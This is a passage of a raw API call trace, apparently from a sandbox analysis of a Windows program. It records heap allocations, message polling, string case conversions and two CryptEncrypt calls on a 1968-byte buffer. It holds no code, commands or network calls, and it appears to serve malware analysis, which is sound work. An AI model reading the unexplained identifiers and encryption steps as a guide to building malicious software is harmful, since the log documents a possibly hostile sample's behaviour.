Flags=0x0, Size=0x10) returned 0x2aaa4f8 [0150.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa348 [0150.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0150.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa510 [0150.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0150.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0150.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0150.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0150.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0150.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0150.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73f20 | out: hHeap=0x2af0000) returned 1 [0150.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0150.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0150.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fc0 [0150.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa420 [0150.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2b8 [0150.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0150.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa498 [0150.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0150.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0150.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0150.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa420 | out: hHeap=0x2af0000) returned 1 [0150.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0150.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0150.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0150.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0150.074] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0150.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0150.074] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0150.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0150.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0150.074] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0150.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0150.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0150.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa528 [0150.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74280 [0150.075] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0150.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0150.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0150.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa390 [0150.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4f8 [0150.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0150.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa510 [0150.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0150.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0150.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0150.075] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0150.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0150.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0150.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0150.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0150.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa390 | out: hHeap=0x2af0000) returned 1 [0150.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0150.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0150.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0150.075] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0150.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0150.075] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0150.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0150.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa420 [0150.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa390 [0150.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0150.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa438 [0150.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0150.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0150.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa390 | out: hHeap=0x2af0000) returned 1 [0150.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa420 | out: hHeap=0x2af0000) returned 1 [0150.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0150.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0150.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2e8 [0150.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4b0 [0150.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0150.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa360 [0150.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0150.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0150.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0150.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0150.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0150.120] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0150.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74280 | out: hHeap=0x2af0000) returned 1 [0150.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0150.120] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0150.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0150.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0150.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0150.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0150.120] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0150.120] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0150.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0150.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0150.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0150.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0150.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0150.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0150.121] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0150.121] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0150.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0150.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa348 [0150.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0150.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0150.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0150.121] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0150.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0150.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0150.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa480 [0150.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0150.121] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0150.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0150.121] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0150.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0150.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0150.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0150.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0150.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0150.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0150.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0150.121] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0150.122] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0150.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0150.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0150.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0150.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0150.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0150.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0150.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0150.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0150.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0150.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0150.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0150.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0150.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0150.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0150.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0150.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0150.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0150.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0150.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0150.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0150.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0150.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0150.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0150.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0150.122] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0150.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0150.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0150.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0150.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0150.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0150.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0150.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0150.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0150.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0150.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0150.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0150.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a758c8 | out: hHeap=0x2af0000) returned 1 [0150.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0150.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0150.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0150.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0150.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0150.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0150.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0150.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0150.123] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0150.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0150.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0150.124] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0150.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0150.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0150.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0150.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0150.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0150.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0150.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0150.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0150.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0150.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0150.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0150.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0150.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0150.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0150.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0150.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa258, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0150.124] CryptEncrypt (in: hKey=0x9e1b38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x7af, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x7b0) returned 1 [0150.125] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.125] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.125] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.125] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.125] CharLowerBuffW (in: lpsz="byte[1968]", cchLength=0xa | out: lpsz="byte[1968]") returned 0xa [0150.125] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.125] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.125] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0150.125] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.125] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0150.125] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.125] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.125] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0150.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0150.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa450, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0150.125] CryptEncrypt (in: hKey=0x9e1b38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a9a140*, pdwDataLen=0x8cef60*=0x7af, dwBufLen=0x7b0 | out: pbData=0x2a9a140*, pdwDataLen=0x8cef60*=0x7b0) returned 1 [0150.125] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 